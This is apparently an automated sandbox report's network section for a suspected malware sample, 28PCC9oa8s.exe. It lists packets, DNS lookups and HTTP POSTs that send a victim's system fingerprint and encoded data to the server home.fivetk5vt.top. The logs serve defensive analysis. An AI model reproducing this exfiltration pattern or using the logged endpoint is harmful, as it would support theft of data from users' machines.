                                                          Dec 20, 2024 17:15:23.333754063 CET8049710185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:23.375921965 CET8049710185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:23.403309107 CET8049710185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:23.403364897 CET8049710185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:23.403374910 CET8049710185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:23.403485060 CET8049710185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:23.403496027 CET8049710185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:23.403505087 CET8049710185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:23.412703037 CET8049710185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:23.412724018 CET8049710185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:23.412934065 CET8049710185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:23.412944078 CET8049710185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:23.413048029 CET8049710185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:23.413187027 CET8049710185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:23.413197041 CET8049710185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:23.413228035 CET8049710185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:23.413342953 CET8049710185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:23.413357019 CET8049710185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:23.413404942 CET8049710185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:23.415679932 CET8049710185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:23.415781021 CET8049710185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:23.415791988 CET8049710185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:23.415808916 CET8049710185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:23.415852070 CET8049710185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:23.415862083 CET8049710185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:23.415921926 CET8049710185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:23.415958881 CET8049710185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:23.415968895 CET8049710185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:23.418730021 CET8049710185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:23.418764114 CET8049710185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:23.418773890 CET8049710185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:23.418858051 CET8049710185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:23.418868065 CET8049710185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:23.418900013 CET8049710185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:23.418910027 CET8049710185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:23.418960094 CET8049710185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:23.419034004 CET8049710185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:23.422204018 CET8049710185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:23.422215939 CET8049710185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:23.422229052 CET8049710185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:23.422239065 CET8049710185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:23.422264099 CET8049710185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:23.422274113 CET8049710185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:23.422333956 CET8049710185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:23.422344923 CET8049710185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:23.422389030 CET8049710185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:23.424120903 CET8049710185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:23.424132109 CET8049710185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:23.424175024 CET8049710185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:23.424185038 CET8049710185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:23.424222946 CET8049710185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:23.424340963 CET8049710185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:23.424351931 CET8049710185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:23.424360991 CET8049710185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:23.424371958 CET8049710185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:23.425487041 CET8049710185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:23.425510883 CET8049710185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:23.425589085 CET8049710185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:23.425597906 CET8049710185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:23.427387953 CET8049710185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:23.427414894 CET8049710185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:23.427423954 CET8049710185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:23.441243887 CET8049710185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:23.442090034 CET8049710185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:23.655282974 CET4971680192.168.2.7185.121.15.192
                                                          Dec 20, 2024 17:15:23.775486946 CET8049716185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:23.775942087 CET4971680192.168.2.7185.121.15.192
                                                          Dec 20, 2024 17:15:23.775986910 CET4971680192.168.2.7185.121.15.192
                                                          Dec 20, 2024 17:15:23.895838976 CET8049716185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:25.072978020 CET8049716185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:25.073103905 CET8049716185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:25.073266029 CET4971680192.168.2.7185.121.15.192
                                                          Dec 20, 2024 17:15:25.073561907 CET4971680192.168.2.7185.121.15.192
                                                          Dec 20, 2024 17:15:25.193169117 CET8049716185.121.15.192192.168.2.7

                                                          UDP Packets

                                                          TimestampSource PortDest PortSource IPDest IP
                                                          Dec 20, 2024 17:15:14.730369091 CET5288653192.168.2.71.1.1.1
                                                          Dec 20, 2024 17:15:14.730541945 CET5288653192.168.2.71.1.1.1
                                                          Dec 20, 2024 17:15:14.867667913 CET53528861.1.1.1192.168.2.7
                                                          Dec 20, 2024 17:15:14.868910074 CET53528861.1.1.1192.168.2.7
                                                          Dec 20, 2024 17:15:17.938627958 CET5623253192.168.2.71.1.1.1
                                                          Dec 20, 2024 17:15:17.938708067 CET5623253192.168.2.71.1.1.1
                                                          Dec 20, 2024 17:15:18.234877110 CET53562321.1.1.1192.168.2.7
                                                          Dec 20, 2024 17:15:18.340297937 CET53562321.1.1.1192.168.2.7
                                                          Dec 20, 2024 17:15:19.966170073 CET5623453192.168.2.71.1.1.1
                                                          Dec 20, 2024 17:15:19.966285944 CET5623453192.168.2.71.1.1.1
                                                          Dec 20, 2024 17:15:20.104475975 CET53562341.1.1.1192.168.2.7
                                                          Dec 20, 2024 17:15:20.104491949 CET53562341.1.1.1192.168.2.7
                                                          Dec 20, 2024 17:15:21.763134003 CET5623653192.168.2.71.1.1.1
                                                          Dec 20, 2024 17:15:21.763195992 CET5623653192.168.2.71.1.1.1
                                                          Dec 20, 2024 17:15:21.903438091 CET53562361.1.1.1192.168.2.7
                                                          Dec 20, 2024 17:15:21.904032946 CET53562361.1.1.1192.168.2.7
                                                          Dec 20, 2024 17:15:23.511454105 CET5623853192.168.2.71.1.1.1
                                                          Dec 20, 2024 17:15:23.511518002 CET5623853192.168.2.71.1.1.1
                                                          Dec 20, 2024 17:15:23.652947903 CET53562381.1.1.1192.168.2.7
                                                          Dec 20, 2024 17:15:23.652966022 CET53562381.1.1.1192.168.2.7

                                                          DNS Queries

                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                          Dec 20, 2024 17:15:14.730369091 CET192.168.2.71.1.1.10x8b6bStandard query (0)httpbin.orgA (IP address)IN (0x0001)false
                                                          Dec 20, 2024 17:15:14.730541945 CET192.168.2.71.1.1.10x5373Standard query (0)httpbin.org28IN (0x0001)false
                                                          Dec 20, 2024 17:15:17.938627958 CET192.168.2.71.1.1.10x33Standard query (0)home.fivetk5vt.topA (IP address)IN (0x0001)false
                                                          Dec 20, 2024 17:15:17.938708067 CET192.168.2.71.1.1.10xe340Standard query (0)home.fivetk5vt.top28IN (0x0001)false
                                                          Dec 20, 2024 17:15:19.966170073 CET192.168.2.71.1.1.10x3264Standard query (0)home.fivetk5vt.topA (IP address)IN (0x0001)false
                                                          Dec 20, 2024 17:15:19.966285944 CET192.168.2.71.1.1.10x93f9Standard query (0)home.fivetk5vt.top28IN (0x0001)false
                                                          Dec 20, 2024 17:15:21.763134003 CET192.168.2.71.1.1.10x6d61Standard query (0)home.fivetk5vt.topA (IP address)IN (0x0001)false
                                                          Dec 20, 2024 17:15:21.763195992 CET192.168.2.71.1.1.10xb60eStandard query (0)home.fivetk5vt.top28IN (0x0001)false
                                                          Dec 20, 2024 17:15:23.511454105 CET192.168.2.71.1.1.10xf238Standard query (0)home.fivetk5vt.topA (IP address)IN (0x0001)false
                                                          Dec 20, 2024 17:15:23.511518002 CET192.168.2.71.1.1.10xc0a1Standard query (0)home.fivetk5vt.top28IN (0x0001)false

                                                          DNS Answers

                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                          Dec 20, 2024 17:15:14.868910074 CET1.1.1.1192.168.2.70x8b6bNo error (0)httpbin.org98.85.100.80A (IP address)IN (0x0001)false
                                                          Dec 20, 2024 17:15:14.868910074 CET1.1.1.1192.168.2.70x8b6bNo error (0)httpbin.org34.226.108.155A (IP address)IN (0x0001)false
                                                          Dec 20, 2024 17:15:18.234877110 CET1.1.1.1192.168.2.70x33No error (0)home.fivetk5vt.top185.121.15.192A (IP address)IN (0x0001)false
                                                          Dec 20, 2024 17:15:20.104475975 CET1.1.1.1192.168.2.70x3264No error (0)home.fivetk5vt.top185.121.15.192A (IP address)IN (0x0001)false
                                                          Dec 20, 2024 17:15:21.903438091 CET1.1.1.1192.168.2.70x6d61No error (0)home.fivetk5vt.top185.121.15.192A (IP address)IN (0x0001)false
                                                          Dec 20, 2024 17:15:23.652947903 CET1.1.1.1192.168.2.70xf238No error (0)home.fivetk5vt.top185.121.15.192A (IP address)IN (0x0001)false

                                                          HTTP Request Dependency Graph

                                                          • httpbin.org
                                                          • home.fivetk5vt.top

                                                          HTTP Packets

                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          0192.168.2.749703185.121.15.192807672C:\Users\user\Desktop\28PCC9oa8s.exe
                                                          TimestampBytes transferredDirectionData
                                                          Dec 20, 2024 17:15:18.462779999 CET12360OUTPOST /hLfzXsaqNtoEGyaUtOMJ1734514745 HTTP/1.1
                                                          Host: home.fivetk5vt.top
                                                          Accept: */*
                                                          Content-Type: application/json
                                                          Content-Length: 444875
                                                          Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 31 37 33 34 37 31 31 33 31 36 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 32 36 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 [TRUNCATED]
                                                          Data Ascii: { "ip": "8.46.123.189", "current_time": "1734711316", "Num_processor": 4, "Num_ram": 7, "drivers": [ { "name": "C:\\", "all": 223.0, "free": 168.0 } ], "Num_displays": 1, "resolution_x": 1280, "resolution_y": 1024, "recent_files": 26, "processes": [ { "name": "[System Process]", "pid": 0 }, { "name": "System", "pid": 4 }, { "name": "Registry", "pid": 92 }, { "name": "smss.exe", "pid": 328 }, { "name": "csrss.exe", "pid": 412 }, { "name": "wininit.exe", "pid": 488 }, { "name": "csrss.exe", "pid": 496 }, { "name": "winlogon.exe", "pid": 556 }, { "name": "services.exe", "pid": 624 }, { "name": "lsass.exe", "pid": 632 }, { "name": "svchost.exe", "pid": 748 }, { "name": "fontdrvhost.exe", "pid": 772 }, { "name": "fontdrvhost.exe", "pid": 780 }, { "name": "svchost.exe", "pid": 864 }, { "name": "svchost.exe", "pid": 912 }, { "name": "dwm.exe", "pid": 976 }, { "name": "svchost.exe", "pid": 356 }, { "name": "svchost.exe", "pid": 704 }, { "name": "svchost.exe", "pid": 860 }, { "name": "svchost.exe", "pid": [TRUNCATED]
                                                          Dec 20, 2024 17:15:18.582690001 CET4944OUTData Raw: 61 55 76 68 68 4f 55 30 34 6e 42 30 55 39 6c 78 79 4f 6e 38 71 5a 58 39 45 48 34 4f 46 46 46 46 42 70 54 36 5c 2f 4c 39 53 46 34 2b 51 5c 2f 76 5c 2f 41 4a 5c 2f 58 5c 2f 50 6f 32 72 46 66 73 48 5c 2f 77 54 47 5c 2f 59 6c 2b 43 48 37 57 76 67 5c
                                                          Data Ascii: aUvhhOU04nB0U9lxyOn8qZX9EH4OFFFFBpT6\/L9SF4+Q\/v\/AJ\/X\/Po2rFfsH\/wTG\/Yl+CH7Wvg\/4ran8WIvFgvvBPiPw3YaRP4X8QroxktNb03Uri4ivo57DUoZvJm0xGtniit5F+0XCzvOvkLB+f8AiZ4kZH4VcLVuLuIcJm2My2jjcHgZUMmoYPEY51sbOVOlKNPHY7LqDpxcW6jeJUkrcsJvQ\/U\/CLwo4j8aOM
                                                          Dec 20, 2024 17:15:18.582776070 CET4944OUTData Raw: 6e 64 57 68 6b 47 4f 68 57 79 33 42 30 63 46 6a 63 77 77 57 55 38 4f 59 33 4d 73 75 78 57 62 4c 43 59 76 45 59 65 6f 73 48 68 46 6c 38 59 56 61 75 47 62 71 77 56 61 6d 6c 46 2b 30 69 70 5c 2f 6f 73 6e 77 4c 6c 30 72 54 57 50 68 7a 78 5a 70 65 72
                                                          Data Ascii: ndWhkGOhWy3B0cFjcwwWU8OY3MsuxWbLCYvEYeosHhFl8YVauGbqwVamlF+0ip\/osnwLl0rTWPhzxZperW8JLi38QRp4S1IqV3yO0t1eX3hqOCEcefdeJbSWXG4WkZOwcq+leEtIAbxD4wgubgBC2keDbM+IruKTO5oLzWLmfSfDMUbJhVvdF1bxL5Uj\/ADWb7GU9z8NPiZp\/xe+Cmn+PtNt57SPWtCuReW00E8KW2r2UbWW
                                                          Dec 20, 2024 17:15:18.582912922 CET2472OUTData Raw: 4c 48 37 7a 5c 2f 79 62 5c 2f 48 5c 2f 50 70 54 5c 2f 4c 5c 2f 64 77 5c 2f 75 50 6b 39 35 66 33 48 32 6a 39 66 70 5c 2f 55 55 78 59 39 30 65 2b 48 35 50 33 6f 5c 2f 31 6e 2b 6f 5c 2f 77 44 31 66 6e 57 33 74 66 4f 58 39 66 4d 31 70 66 5a 2b 66 36
                                                          Data Ascii: LH7z\/yb\/H\/PpT\/L\/dw\/uPk95f3H2j9fp\/UUxY90e+H5P3o\/1n+o\/wD1fnW3tfOX9fM1pfZ+f6jPvfudkePK82L972\/5+v8APrTPLdR8\/wAj+b\/y17c\/8un6dvfPFTb\/AJtjvsh\/1R\/df8sM\/wCT296Pn8tH2R7LjPv\/AC\/z+NUAzd5snmIkif8ALX\/Vef0x\/Pr\/AJ4Z\/q9\/z7+f9X5vnwf5HY+v
                                                          Dec 20, 2024 17:15:18.582994938 CET4944OUTData Raw: 35 35 78 35 31 33 62 76 77 4d 35 51 63 67 5a 42 2b 4f 74 75 33 6a 47 4f 5c 2f 72 58 30 58 2b 30 5a 71 31 6e 63 2b 49 64 42 30 61 32 76 37 4b 38 66 54 4e 4f 75 37 6d 63 57 64 31 46 64 4c 44 4c 71 46 30 6b 4a 6a 6b 61 46 6e 45 63 77 58 54 6b 5a 6f
                                                          Data Ascii: 55x513bvwM5QcgZB+Otu3jGO\/rX0X+0Zq1nc+IdB0a2v7K8fTNOu7mcWd1FdLDLqF0kJjkaFnEcwXTkZopNkqq0bMoV0J+dK\/wBL\/o84KjhfCfhzEUpQn\/as8yzSc6bUozWIzHE0qElJN818JQwzvutuh\/jr9KvMa+N8cOLsLWjUp\/2LDJ8mhTqKUZ03hcpwlbEwcGly8uPxOLVtn8W8mM2D3\/z+FMf7x\/D+Qqamd3+
                                                          Dec 20, 2024 17:15:18.583014965 CET2472OUTData Raw: 33 6b 5c 2f 77 43 58 66 79 76 33 48 46 72 5c 2f 41 4a 2b 6c 48 37 6e 61 6d 38 38 33 48 5c 2f 4c 50 6e 79 50 35 5c 2f 77 43 65 5c 2f 46 51 74 49 56 6a 52 39 6e 2b 66 54 70 2b 48 66 30 37 30 65 57 6e 7a 72 39 79 50 5c 2f 56 65 58 36 64 50 5c 2f 41
                                                          Data Ascii: 3k\/wCXfyv3HFr\/AJ+lH7nam883H\/LPnyP5\/wCe\/FQtIVjR9n+fTp+Hf070eWnzr9yP\/VeX6dP\/ANf+NBp7Ty\/H\/gA2z5HeHen\/AE0PT\/p69e9Vvu\/cf5\/+en\/PH\/6\/+ee9n7sfyJjjH7\/n\/R\/89uv400qVV38npH\/M1p7Ty\/H\/AIBoH+23z+Z+6\/d\/8tfT\/GoI\/wDpp\/yz+z\/u4wen\/P0P
                                                          Dec 20, 2024 17:15:18.583090067 CET2472OUTData Raw: 43 33 78 51 6f 35 42 51 34 39 7a 72 68 5c 2f 4f 4a 5a 4a 6e 6c 48 2b 30 36 4f 66 34 33 45 34 66 45 79 7a 47 46 66 45 7a 77 38 63 52 4e 7a 78 64 58 47 31 63 52 69 73 52 52 78 54 6f 51 72 55 5c 2f 72 4f 4c 68 67 73 78 78 46 47 46 57 6a 6c 32 50 71
                                                          Data Ascii: C3xQo5BQ49zrh\/OJZJnlH+06Of43E4fEyzGFfEzw8cRNzxdXG1cRisRRxToQrU\/rOLhgsxxFGFWjl2Pq0PQ5LGZR8qb0+n1z1I7fWoTE6nDKV+oqez1G1uoxNp91bXUJxiW1niuIz6YkiZlOR79Pap7zVYbO0mub\/LwW6F5GCljgcAKqgszMxCoo5ZiFHJr7b93ye19ovZ8rnz80eTlSu5c23Kkm73tufnf+0e0VLkn7RyUO
                                                          Dec 20, 2024 17:15:18.583127975 CET2472OUTData Raw: 46 5a 74 44 4a 5c 2f 62 5a 2b 47 4e 39 38 57 76 67 6e 6f 36 79 66 44 33 34 4a 2b 50 37 36 78 76 33 38 4a 61 62 65 79 65 4c 4e 51 31 79 78 30 6a 77 74 6f 46 31 41 78 54 78 46 66 36 66 6a 55 4b 5c 2f 48 65 4e 75 4f 5c 2f 6f 5c 2f 63 65 5a 46 53 34
                                                          Data Ascii: FZtDJ\/bZ+GN98Wvgno6yfD34J+P76xv38JabeyeLNQ1yx0jwtoF1AxTxFf6fjUK\/HeNuO\/o\/ceZFS4f4v4mybOsmzCnlGdUcBh8fnVGtX+s5picpympB5HLD5isRWzfDYvLoYFTjiHjqFXC1sN7Wm4L988N\/Df6Ufh3xHiuKfD7gviPJM+yalmuV4vM62V5DiqGDwyoZbPM3VhxDSxeV\/U\/q2Z5ZWWZOlLDOhjMPXw2K
                                                          Dec 20, 2024 17:15:18.704077005 CET2472OUTData Raw: 35 4f 33 34 5c 2f 77 42 4b 6e 62 6f 76 30 5c 2f 6f 4b 5a 57 5a 30 45 63 6e 62 38 66 36 56 48 56 69 6f 32 62 73 50 78 50 38 41 68 51 62 65 5c 2f 77 44 33 66 78 4b 64 51 76 38 41 65 50 34 66 79 46 58 57 42 62 38 38 31 48 73 50 74 5c 2f 6e 38 4b 44
                                                          Data Ascii: 5O34\/wBKnbov0\/oKZWZ0Ecnb8f6VHVio2bsPxP8AhQbe\/wD3fxKdQv8AeP4fyFXWBb881HsPt\/n8KDenU\/Wztv8A1\/XnUqOX75\/z3NWcff75\/n1\/rVb\/AJaf5\/u1t7\/938Sxkn3fv\/5\/M\/4\/hxUP578\/59sY\/wA4qeXv\/u\/41B3\/AL\/58fzFYnQD9fw\/qarv1\/Cpagk\/74\/z\/n396DoK7B\/
                                                          Dec 20, 2024 17:15:18.704128981 CET7416OUTData Raw: 33 58 61 5c 2f 77 43 38 65 50 70 7a 2b 48 70 2b 4a 39 2b 39 4d 32 76 74 68 2b 51 6f 5c 2f 77 44 71 70 5a 50 5c 2f 41 47 31 5c 2f 6c 5c 2f 6e 69 72 52 56 5c 2f 4d 54 66 35 6e 2b 75 5c 2f 35 5a 79 5c 2f 75 50 38 41 36 31 52 37 58 33 37 33 2b 51 2b
                                                          Data Ascii: 3Xa\/wC8ePpz+Hp+J9+9M2vth+Qo\/wDqpZP\/AG1\/l\/nirRV\/MTf5n+u\/5Zy\/uP8A61R7X373+Q+d5X7z\/lr\/AC+nX+dHs\/P8P+CAzy\/3cKM5dP8ASPN\/Kj5AqPM\/l\/8APXt\/o\/8An8fyok3yK6fc69\/8jnn8KZ5j8On2fyfXyv3H\/Xraf5OazOghb729EkTy\/wBP8\/57UpR\/4E2eZ\/y09x\/ntUv+
                                                          Dec 20, 2024 17:15:18.704147100 CET3708OUTData Raw: 4a 74 64 48 30 72 54 50 6f 77 65 46 5c 2f 44 4b 6b 4d 76 68 33 51 6c 5a 53 43 72 44 53 4e 50 42 42 42 79 43 43 4c 66 49 49 50 49 49 35 42 72 61 52 45 69 52 59 34 6b 53 4f 4e 42 68 55 52 51 69 4b 50 52 56 55 42 51 50 59 41 56 39 58 34 5a 66 52 59
                                                          Data Ascii: JtdH0rTPoweF\/DKkMvh3QlZSCrDSNPBBByCCLfIIPII5BraREiRY4kSONBhURQiKPRVUBQPYAV9X4ZfRY4T8Pc\/yHiKvmWNz\/G8L5FlWS5BHF0sLRp4OrldfPatPNqqw2GozxeaThxHmuGeLxU61aNDFYhQqKeMx08V+b+LP0xuNPErhLNuDsJleD4byriHH4zE5\/wDVsRjMXUzDB4p5fVWWR+uYnEUsHg6eJy3CYj2OAp4


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          1192.168.2.749704185.121.15.192807672C:\Users\user\Desktop\28PCC9oa8s.exe
                                                          TimestampBytes transferredDirectionData
                                                          Dec 20, 2024 17:15:20.228579998 CET12360OUTPOST /hLfzXsaqNtoEGyaUtOMJ1734514745 HTTP/1.1
                                                          Host: home.fivetk5vt.top
                                                          Accept: */*
                                                          Content-Type: application/json
                                                          Content-Length: 444875
                                                          Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 31 37 33 34 37 31 31 33 31 36 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 32 36 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 [TRUNCATED]
                                                          Data Ascii: { "ip": "8.46.123.189", "current_time": "1734711316", "Num_processor": 4, "Num_ram": 7, "drivers": [ { "name": "C:\\", "all": 223.0, "free": 168.0 } ], "Num_displays": 1, "resolution_x": 1280, "resolution_y": 1024, "recent_files": 26, "processes": [ { "name": "[System Process]", "pid": 0 }, { "name": "System", "pid": 4 }, { "name": "Registry", "pid": 92 }, { "name": "smss.exe", "pid": 328 }, { "name": "csrss.exe", "pid": 412 }, { "name": "wininit.exe", "pid": 488 }, { "name": "csrss.exe", "pid": 496 }, { "name": "winlogon.exe", "pid": 556 }, { "name": "services.exe", "pid": 624 }, { "name": "lsass.exe", "pid": 632 }, { "name": "svchost.exe", "pid": 748 }, { "name": "fontdrvhost.exe", "pid": 772 }, { "name": "fontdrvhost.exe", "pid": 780 }, { "name": "svchost.exe", "pid": 864 }, { "name": "svchost.exe", "pid": 912 }, { "name": "dwm.exe", "pid": 976 }, { "name": "svchost.exe", "pid": 356 }, { "name": "svchost.exe", "pid": 704 }, { "name": "svchost.exe", "pid": 860 }, { "name": "svchost.exe", "pid": [TRUNCATED]
                                                          Dec 20, 2024 17:15:20.348398924 CET7416OUTData Raw: 61 55 76 68 68 4f 55 30 34 6e 42 30 55 39 6c 78 79 4f 6e 38 71 5a 58 39 45 48 34 4f 46 46 46 46 42 70 54 36 5c 2f 4c 39 53 46 34 2b 51 5c 2f 76 5c 2f 41 4a 5c 2f 58 5c 2f 50 6f 32 72 46 66 73 48 5c 2f 77 54 47 5c 2f 59 6c 2b 43 48 37 57 76 67 5c
                                                          Data Ascii: aUvhhOU04nB0U9lxyOn8qZX9EH4OFFFFBpT6\/L9SF4+Q\/v\/AJ\/X\/Po2rFfsH\/wTG\/Yl+CH7Wvg\/4ran8WIvFgvvBPiPw3YaRP4X8QroxktNb03Uri4ivo57DUoZvJm0xGtniit5F+0XCzvOvkLB+f8AiZ4kZH4VcLVuLuIcJm2My2jjcHgZUMmoYPEY51sbOVOlKNPHY7LqDpxcW6jeJUkrcsJvQ\/U\/CLwo4j8aOM
                                                          Dec 20, 2024 17:15:20.348520994 CET3708OUTData Raw: 41 6e 38 4b 69 71 78 55 66 6c 2b 5c 2f 36 66 5c 2f 58 6f 41 6a 6f 71 54 79 5c 2f 66 39 50 38 41 36 39 52 30 47 6e 74 50 4c 38 66 2b 41 52 2b 58 37 5c 2f 70 5c 2f 39 65 6f 36 73 55 55 47 68 58 71 4f 54 74 2b 4e 58 4b 72 30 41 56 36 4b 73 55 32 54
                                                          Data Ascii: An8KiqxUfl+\/6f\/XoAjoqTy\/f9P8A69R0GntPL8f+AR+X7\/p\/9eo6sUUGhXqOTt+NXKr0AV6KsU2Tn5+mP6f1Heg6CGiiigCLYfb\/AD+FMqxVetPZ+f4f8E6AqOTt+P8ASpKay7qPZ+f4f8ECGm7F9P5\/406ij2fn+H\/BNKfX5fqM2D3\/AM\/hVdl3fy+tWd\/7xF\/z6\/8A1\/8A9VQ0ez8\/w\/4JoRbD7f5\/C
                                                          Dec 20, 2024 17:15:20.348537922 CET1236OUTData Raw: 77 42 45 37 66 6e 33 70 6a 52 76 38 69 44 50 5c 2f 4c 78 35 32 66 38 41 50 31 34 2b 74 50 6b 33 37 63 66 76 48 38 7a 39 31 46 4a 48 33 48 2b 66 62 39 61 66 48 2b 38 2b 34 2b 39 50 39 49 6c 6d 4d 6e 50 2b 66 53 67 36 43 74 4a 49 36 53 49 6e 6b 37
                                                          Data Ascii: wBE7fn3pjRv8iDP\/Lx52f8AP14+tPk37cfvH8z91FJH3H+fb9afH+8+4+9P9IlmMnP+fSg6CtJI6SInk70j\/wBbJJ\/n\/wCt\/Rkn7uNA\/wAif8\/B\/wA+vvT9qSLs\/wBTDH\/z0i\/x\/X070RxuzOiQ7HH7n\/Wf559OPSp9r5y\/r5gQ\/JHsf95+7\/e5k\/1E3+f60SfK3+r\/ANZL+9\/5Yf59KPLTds2fPJF\/
